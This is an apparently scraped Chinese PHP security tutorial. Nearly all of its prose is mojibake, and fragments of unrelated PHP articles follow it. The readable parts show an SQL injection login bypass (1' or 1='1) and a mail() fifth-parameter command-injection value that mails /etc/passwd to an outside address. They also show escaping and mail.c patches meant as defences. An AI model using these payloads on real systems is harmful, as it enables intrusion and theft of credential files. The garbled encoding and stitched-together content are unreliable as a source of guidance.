PHPÍøÕ¾¿ª·¢¹ý³ÌÖÐ×¢ÒâÕâЩ°²È«ÖªÊ¶
1¡¢¹ÅÀÏµÄÆÛÆSQLÓï¾ä
ÔÚĬÈÏģʽÏ£¬¼´Ê¹ÊÇÄãÍüÁ˰Ñphp.ini¿½µ½/usr/local/lib/php.iniÏ£¬php»¹ÊÇ´ò¿ªmagic_quotes_gpc=on¡£
ÕâÑùËùÓдÓGET/POST/CookieÀ´µÄ±äÁ¿µÄµ¥ÒýºÅ(')¡¢Ë«ÒýºÅ(")¡¢·´Ð±¸Übackslash(\)ÒÔ¼°¿Õ×ÖÔªNUL
(the null byte)¶¼»á±»¼ÓÉÏ·´Ð±¸Ü£¬ÒÔʹÊý¾Ý¿âÄܹ»ÕýÈ·²éѯ¡£
µ«ÊÇÔÚphp-4-RC2µÄʱºòÒýÈëÁËÒ»¸öÅäÖÃÎļþphp.ini-optimized£¬Õâ¸öÓÅ»¯µÄphp.iniÈ´ÊÇ
magic_quotes_gpc=offµÄ¡£Ä³Ð©Íø¹Ü¿´µ½optimized×ÖÑùÒ²Ðí¾Í»á°Ñphp.ini-optimized¿½µ½
/usr/local/lib/php.ini£¬Õâʱ¾Í±È½ÏΣÏÕ¡£Ïó±È½Ï¼òµ¥µÄÑéÖ¤£¬¼ÙÉèûÓйýÂ˱ØÒªµÄ×Ö·û£º
select * from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]'
ÎÒÃǾͿÉÒÔÔÚÓû§¿òºÍÃÜÂë¿òÊäÈë1‘ or 1='1ͨ¹ýÑéÖ¤ÁË¡£ÕâÊǷdz£¹Å¶µÄ·½·¨ÁË£¬Õâ¸öÓï¾ä»á
Ìæ»»³ÉÕâÑù£º
select * from login where user='1' or 1='1' and pass='1' or 1='1'
ÒòΪor 1='1'³ÉÁ¢£¬ËùÒÔͨ¹ýÁË¡£
½â¾öµÄ°ì·¨×îºÃ¾ÍÊǹýÂËËùÓв»±ØÒªµÄ×Ö·û£¬»¹ÓоÍÊÇÍÆ¼ö¶ÔÓÚ´ÓGET/POST/CookieÀ´µÄ²¢ÇÒÓÃÔÚSQL
ÖеıäÁ¿¼ÓÒ»¸ö×Ô¶¨ÒåµÄº¯Êý£º
function gpc2sql($str) {
if(get_magic_quotes_gpc()==1)
return $str;
else
return addslashes($str);
}
Ö÷ÒªÊÇΪÁËÄãµÄ³ÌÐòÄܰ²È«ÒÆÖ²ÔÚ¸÷ÖÖϵͳÀï¡£
2¡¢mailº¯ÊýµÄµÚÎå¸ö²ÎÊý
ÔÚphp-4.0.5µÄʱºò£¬mailº¯ÊýÒýÈëÁ˵ÚÎå¸ö²ÎÊý£¬ÓÃÀ´ÉèÖÃÔÚʵ¼Ê·¢ËÍÓʼþµÄʱºòÔö¼Ó¶îÍâµÄÃüÁîÐвÎÊý£¬µ«ÊÇûÓкܺõļì²éÌØÊâSHELLÃüÁî×Ö·û£¬ËùÒÔ³öÏÖÖ´ÐÐÃüÁîµÄ´óÎÊÌâ¡£¾ÍÏñÊÖ²áÀïµÄÀý×Ó£º
mail("nobody@aol.com", "the subject", $message, "from: webmaster@$SERVER_NAME", "-fwebmaster@$SERVERNAM");
Õâ¸öÊÇ´æÔÚÎÊÌâµÄ£¬Èç¹û$SERVER_NAME=;mail webjx@webjx.com < /etc/passwd¾ÍÄܰѻúÆ÷µÄÃÜÂë·¢Ë͵½ÎÒµÄÐÅÏäÁË¡£
ÕâÀïÌáÐÑһϣ¬phpÊÖ²áÀﻹÓкü¸¸öÀý×Ó´æÔÚ°²È«ÎÊÌâµÄ£¬´ó¼Òʵ¼ÊʹÓõÄʱºò²»ÒªÕհᣬËüÖ»ÊÇÑÝʾº¯ÊýµÄ»ù±¾¹¦ÄÜ£¬Àí½âÁ˾ͿÉÒÔÁË¡£
¶ÔÓÚmailº¯ÊýµÄÕâ¸öÎÊÌ⣬×î¼òµ¥µÄÎÒÃǾͲ»ÓÃÕâ¸öµÚÎå¸ö²ÎÊý£¬ÒªÊ¹Óþ͹ýÂË·Ç·¨µÄ×Ö·ûÈç(;)£¬»¹ÓоÍÊÇÐÞ¸ÄphpÔ´Âë°üµÄ³ÌÐòext/standard/mail.c£¬ÔÚif (extra_cmd != NULL) { ǰÔö¼ÓÈçÏÂÒ»ÐУº
extra_cmd=NULL
È»ºóÖØÐ±àÒë¡£
3¡¢UNIX°æµÄrequire, includeº¯Êý
win°æ±¾µÄrequireºÍincludeº¯ÊýÊDz»Ö§³ÖHTTPºÍFTPÔ¶³ÌÎļþ°üº¬µÄ£¬¶øUNIX°æ±¾Ä¬È϶¼ÊÇÖ§³Ö
Ïà¹ØÎĵµ£º
ÖÓʤ»Ô̸PHP·¢Õ¹µÄÏÖ×´ºÍǰ¾°
diggsoft.com ʱ¼ä:2009-09-19 12:56À´Ô´:51CTO
ÖÓʤ»Ô£¨µµ·ç£© PHPCMS´´Ê¼ÈË ÔKu6 PhpcmsÊÂÒµ²¿¾Àí 51CTO¼ÇÕߣº´ÓWeb¿ª·¢µÄÀúÊ·¿´À´£¬PHP¡¢PythonºÍRuby¼¸ºõÊÇͬʱ³öÏֵ쬶¼ÊÇÊ®·ÖÓÐÌØµãµÄ¡¢ÓÅÐãµÄ¿ªÔ´ÓïÑÔ£¬µ«PHPÈ´»ñµÃÁ˱ÈPythonºÍRuby¶àµÃ¶àµÄ
¡¡¡¡
ÖÓʤ»Ô£¨ ......
1. ½éÉÜ
1.1. ±ê×¼»¯µÄÖØÒª**
±ê×¼»¯ÎÊÌâÔÚijЩ·½ÃæÉÏÈÃÿ¸öÈËÍ·Í´£¬ÈÃÈËÈ˶¼¾õµÃ´ó¼Ò´¦ÓÚͬÑùµÄ¾³µØ¡£ÕâÓÐÖúÓÚÈÃÕâЩ½¨ÒéÔÚÐí¶àµÄÏîÄ¿Öв»¶ÏÑݽø£¬Ðí¶à¹«Ë¾»¨·ÑÁËÐí¶àÐÇÆÚÖð×Ó×ÖÖð¾äµÄ½øÐÐÕùÂÛ¡£±ê×¼»¯²»ÊÇÌØÊâµÄ¸öÈË·ç¸ñ£¬Ëü¶Ô±¾µØ¸ÄÁ¼ÊÇÍêÈ«¿ª·ÅµÄ¡£
1.2. Óŵã
µ±Ò»¸öÏîÄ¿³¢ÊÔ×Å×ñÊØ¹«Óõıê׼ʱ£¬»áÓÐÒÔϺô¦£ ......
<?
//http://www.jb51.net
class upLoad{
public $length; //ÏÞ¶¨Îļþ´óС
public $file; //ÅжϴËÀàÊÇÓÃÓÚͼƬÉÏ´«»¹ÊÇÎļþÉÏ´«
public $fileName; //ÎļþÃû
public $fileTemp; //ÉÏ´«ÁÙʱÎļþ
public $fileSize; //ÉÏ´«Îļþ´óС
public $error; //ÉÏ´«ÎļþÊÇ·ñÓдí,php4ûÓÐ
public $fileType; //ÉÏ ......
1.Èç¹ûÒ»¸ö·½·¨¿É¾²Ì¬»¯£¬¾Í¶ÔËü×ö¾²Ì¬ÉùÃ÷¡£ËÙÂÊ¿ÉÌáÉýÖÁ4±¶¡£
2.echo ±È print ¿ì¡£
3.ʹÓÃechoµÄ¶àÖØ²ÎÊý£¨Òë×¢£ºÖ¸ÓöººÅ¶ø²»ÊǾäµã£©´úÌæ×Ö·û´®Á¬½Ó¡£
4.ÔÚÖ´ÐÐforÑ»·Ö®Ç°È·¶¨×î´óÑ»·Êý£¬²»ÒªÃ¿Ñ»·Ò»´Î¶¼¼ÆËã×î´óÖµ¡£
5.×¢ÏúÄÇЩ²»ÓõıäÁ¿ÓÈÆäÊÇ´óÊý×飬ÒÔ±ãÊÍ·ÅÄÚ´æ¡£
6.¾¡Á¿±ÜÃâʹÓÃ__get£¬__set£¬__autolo ......
×÷Õß ³ÂºÆ £¨Haohappy£©
MSN: haohappy # php.net
2009-08-13
±¾ÎÄ¿¯ÓÚ¡¶³ÌÐòÔ±¡·ÔÓÖ¾ 2009.09
×ªÔØÇë×¢Ã÷×÷Õß¼°³ö´¦
ºÁÎÞÒÉÎÊ£¬Èç½ñPHPÒѾ³ÉΪWEB¿ª·½µ±ÖÐ×îÈÈÃŵļ¼ÊõÖ®Ò»¡£¸ù¾Ýnexen.netµÄµ÷²é£¬»¥ÁªÍøÉÏÈý·ÖÖ®Ò»µÄÍøÕ¾Ñ¡ÔñPHPÀ´¿ª·¢·þÎñÆ÷¶Ë³ÌÐò¡£ÔÚÅ·ÃÀºÍÈÕ±¾µÈ¹ú¼Ò£¬PHP¿ª·¢Êг¡³ÊÏÖ³öһƬÐÀÐ ......